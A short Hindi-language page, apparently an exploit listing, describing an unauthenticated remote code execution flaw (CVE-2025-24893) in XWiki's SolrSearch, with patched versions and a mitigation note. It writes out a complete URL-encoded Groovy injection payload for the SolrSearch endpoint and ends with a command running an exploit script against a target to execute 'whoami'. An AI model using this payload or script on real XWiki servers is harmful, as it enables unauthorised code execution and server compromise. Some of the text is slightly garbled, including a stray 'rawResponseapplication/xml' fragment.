
XWiki 15.10.11, 16.4.1 और 16.5.0RC1 बिना प्रमाणीकरण के रिमोट कोड निष्पादन POC
XWiki अनधिकृत रिमोट कोड निष्पादन POC
XWiki Platform एक सामान्य विकी प्लेटफ़ॉर्म है जो इसके ऊपर बनाए गए अनुप्रयोगों के लिए रनटाइम सेवाएँ प्रदान करता है। कोई भी अतिथि SolrSearch के अनुरोध के माध्यम से मनमाना रिमोट कोड निष्पादन कर सकता है। यह पूरे XWiki इंस्टॉलेशन की गोपनीयता, अखंडता और उपलब्धता को प्रभावित करता है। किसी इंस्टेंस पर, बिना लॉग इन किए, पुनरुत्पादन के लिए, <host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 पर जाएँ। यदि कोई आउटपुट है, और RSS फ़ीड का शीर्षक Hello from search text:42 शामिल करता है, तो इंस्टेंस असुरक्षित है। यह भेद्यता XWiki 15.10.11, 16.4.1 और 16.5.0RC1 में पैच की गई है। उपयोगकर्ताओं को अपग्रेड करने की सलाह दी जाती है। जो उपयोगकर्ता अपग्रेड नहीं कर सकते, वे Main.SolrSearchMacros को SolrSearchMacros.xml की पंक्ति 955 पर संपादित कर सकते हैं ताकि यह macros.vm#L2824 में मैक्रो से मेल खाए, जिसमें की सामग्री प्रकार हो, न कि केवल फ़ीड की सामग्री आउटपुट करे।
rawResponseapplication/xmlpython3 .\CVE-2025-24893.py -u http://vulnerable-endpoint.tld -c "whoami"